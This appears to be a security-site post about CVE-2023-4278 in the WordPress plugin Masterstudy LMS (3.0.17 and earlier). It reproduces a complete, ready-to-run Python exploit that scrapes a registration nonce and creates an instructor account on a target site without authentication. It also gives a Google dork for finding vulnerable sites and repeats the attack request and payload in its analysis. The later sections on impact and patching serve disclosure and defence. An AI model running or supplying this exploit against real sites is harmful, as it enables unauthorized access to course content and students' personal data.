Wordpress Plugin Masterstudy LMS - 3.0.17 - Unauthenticated Instructor Account Creation

Exploit Author: Revan Arifio Analysis Author: www.bubbleslearn.ir Category: WebApps Language: Python Published Date: 2023-10-09 
# Exploit Title:  Wordpress Plugin Masterstudy LMS - 3.0.17 - Unauthenticated Instructor Account Creation
# Google Dork: inurl:/user-public-account
# Date: 2023-09-04
# Exploit Author: Revan Arifio
# Vendor Homepage: https:/.org/plugins/masterstudy-lms-learning-management-system/
# Version: <= 3.0.17
# Tested on: Windows, Linux
# CVE : CVE-2023-4278

import requests
import os
import re
import time

banner = """
   _______      ________    ___   ___ ___  ____        _  _ ___ ______ ___  
  / ____\ \    / /  ____|  |__ \ / _ \__ \|___ \      | || |__ \____  / _ \ 
 | |     \ \  / /| |__ ______ ) | | | | ) | __) |_____| || |_ ) |  / / (_) |
 | |      \ \/ / |  __|______/ /| | | |/ / |__ <______|__   _/ /  / / > _ < 
 | |____   \  /  | |____    / /_| |_| / /_ ___) |        | |/ /_ / / | (_) |
  \_____|   \/   |______|  |____|\___/____|____/         |_|____/_/   \___/ 
                                                                            
======================================================================================================
|| Title            : Masterstudy LMS <= 3.0.17 - Unauthenticated Instructor Account Creation       ||
|| Author           : https://github.com/revan-ar                                                   ||
|| Vendor Homepage  : https:/wordpress.org/plugins/masterstudy-lms-learning-management-system/      ||
|| Support          : https://www.buymeacoffee.com/revan.ar                                         ||
======================================================================================================

"""


print(banner)

# get nonce
def get_nonce(target):
    open_target = requests.get("{}/user-public-account".format(target))
    search_nonce = re.search('"stm_lms_register":"(.*?)"', open_target.text)
    if search_nonce[1] != None:
        return search_nonce[1]
    else:
        print("Failed when getting Nonce :p")



# privielege escalation
def privesc(target, nonce, username, password, email):

    req_data = {
        "user_login":"{}".format(username),
        "user_email":"{}".format(email),
        "user_password":"{}".format(password),
        "user_password_re":"{}".format(password),
        "become_instructor":True,
        "privacy_policy":True,
        "degree":"",
        "expertize":"",
        "auditory":"",
        "additional":[],
        "additional_instructors":[],
        "profile_default_fields_for_register":[],
        "redirect_page":"{}/user-account/".format(target)
        }

    start = requests.post("{}/wp-admin/admin-ajax.php?action=stm_lms_register&nonce={}".format(target, nonce), json = req_data)

    if start.status_code == 200:
        print("[+] Exploit Success !!")
    else:
        print("[+] Exploit Failed :p")



# URL target
target = input("[+] URL Target: ")
print("[+] Starting Exploit")
plugin_check = requests.get("{}/wp-content/plugins/masterstudy-lms-learning-management-system/readme.txt".format(target))
plugin_version = re.search("Stable tag: (.+)", plugin_check.text)
int_version = plugin_version[1].replace(".", "")
time.sleep(1)

if int(int_version) < 3018:
    print("[+] Target is Vulnerable !!")
    # Credential
    email =  input("[+] Email: ")
    username =  input("[+] Username: ")
    password =  input("[+] Password: ")
    time.sleep(1)
    print("[+] Getting Nonce...")
    get_nonce = get_nonce(target)
    # Get Nonce
    if get_nonce != None:
        print("[+] Success Getting Nonce: {}".format(get_nonce))
        time.sleep(1)
        # Start PrivEsc
        privesc(target, get_nonce, username, password, email)
    # ----------------------------------
    
else:
    print("[+] Target is NOT Vulnerable :p")


WordPress Plugin Masterstudy LMS 3.0.17: Unauthenticated Instructor Account Creation Vulnerability

The Masterstudy LMS plugin, a widely used Learning Management System (LMS) for WordPress, has recently been exposed to a critical security flaw affecting versions up to 3.0.17. This vulnerability, identified as CVE-2023-4278, allows attackers to create instructor accounts without authentication, bypassing standard registration safeguards. The exploit is particularly dangerous due to its simplicity and the potential for unauthorized access to administrative features within the platform.

Understanding the Vulnerability

Masterstudy LMS is designed to help educators and institutions manage online courses, student enrollments, and content delivery. One of its core features is the ability for users to register as instructors, granting them elevated privileges such as course creation, content editing, and access to student data.

However, in versions prior to 3.0.18, the plugin fails to properly validate authentication before allowing users to register as instructors. Specifically, the stm_lms_register AJAX action, accessible at /wp-admin/admin-ajax.php?action=stm_lms_register, is vulnerable to unauthenticated requests.

Attackers can exploit this by sending a POST request with minimal data—such as a username, email, and password—along with the become_instructor flag set to True. No login credentials or verification steps are required, making this a classic example of unauthenticated privilege escalation.

Exploit Mechanism and Technical Details

The exploit relies on two key components: the nonce and the action parameter. While nonces are typically used to prevent CSRF attacks, in this case, the plugin does not enforce proper validation of the nonce against authenticated users.

Attackers can retrieve the required nonce by accessing the public registration page:

GET /user-public-account

This page contains the stm_lms_register nonce value embedded in the HTML source, which can be extracted using regular expressions:

re.search('"stm_lms_register":"(.*?)"', response.text)

Once obtained, the attacker can use the nonce to submit a malicious registration request to /wp-admin/admin-ajax.php with the following payload:

POST /wp-admin/admin-ajax.php?action=stm_lms_register&nonce={nonce}

With the payload structured as:

{
  "user_login": "instructor_user",
  "user_email": "instructor@example.com",
  "user_password": "secure_pass123",
  "user_password_re": "secure_pass123",
  "become_instructor": true,
  "privacy_policy": true,
  "degree": "",
  "expertize": "",
  "auditory": "",
  "additional": [],
  "additional_instructors": [],
  "profile_default_fields_for_register": [],
  "redirect_page": "https://target-site.com/user-account/"
}

This request, when sent without authentication, creates a new user account with instructor privileges, effectively granting full control over course content and student data.

Impact and Real-World Consequences

While the exploit itself does not directly lead to data theft or server compromise, the ability to create an instructor account without authentication opens the door to:

  • Unauthorized course creation: An attacker can upload malicious or inappropriate content.
  • Student data exposure: Instructors can access student profiles, grades, and personal information.
  • Admin-level access escalation: If the instructor role includes backend permissions, attackers can later escalate privileges.
  • Website reputation damage: The presence of unauthorized instructors can undermine trust in the platform.

Additionally, this vulnerability can be leveraged in credential stuffing attacks or phishing campaigns, where attackers register fake instructors to impersonate legitimate educators and trick users into providing sensitive information.

Proof of Concept and Detection

The exploit can be tested using a simple Python script, as demonstrated in the original report by Revan Arifio. The script performs the following steps:

  • Checks if the plugin is installed via readme.txt.
  • Retrieves the plugin version to verify vulnerability status.
  • Fetches the nonce from the public registration page.
  • Submits a registration request with instructor privileges.

Example detection using a Google Dork:

inurl:/user-public-account

Such dorks are commonly used by security researchers and automated scanners to locate vulnerable installations across the web.

Vendor Response and Remediation

The plugin developer released version 3.0.18 to patch the vulnerability. This update includes stricter authentication checks and improved nonce validation. Users are strongly advised to update immediately.

As of 2023-09-04, the vulnerability was confirmed and reported to the CVE database. The patch was released within weeks, demonstrating the vendor's responsiveness to security issues.

Best Practices for Mitigation

To protect WordPress sites using Masterstudy LMS, administrators should:

  • Update immediately: Ensure the plugin is upgraded to version 3.0.18 or later.
  • Disable public registration: If not required, disable the user-public-account page.
  • Monitor plugin activity: Use security plugins like Wordfence or Sucuri to detect suspicious AJAX requests.
  • Implement role-based access: Restrict instructor creation to admin-approved processes.
  • Regular audits: Periodically review user accounts and instructor roles to detect unauthorized entries.

Conclusion

The CVE-2023-4278 vulnerability in Masterstudy LMS highlights a common yet dangerous flaw in WordPress plugins: unauthenticated privilege escalation. It serves as a reminder that even well-intentioned features can become security risks if not properly secured.

For developers and site owners, this incident underscores the importance of:

  • Continuous monitoring of third-party plugins.
  • Adopting secure coding practices, especially around AJAX endpoints.
  • Regularly updating software to patch known vulnerabilities.

Security is not a one-time task—it’s an ongoing process. By staying vigilant, organizations can prevent attackers from exploiting such flaws before they cause harm.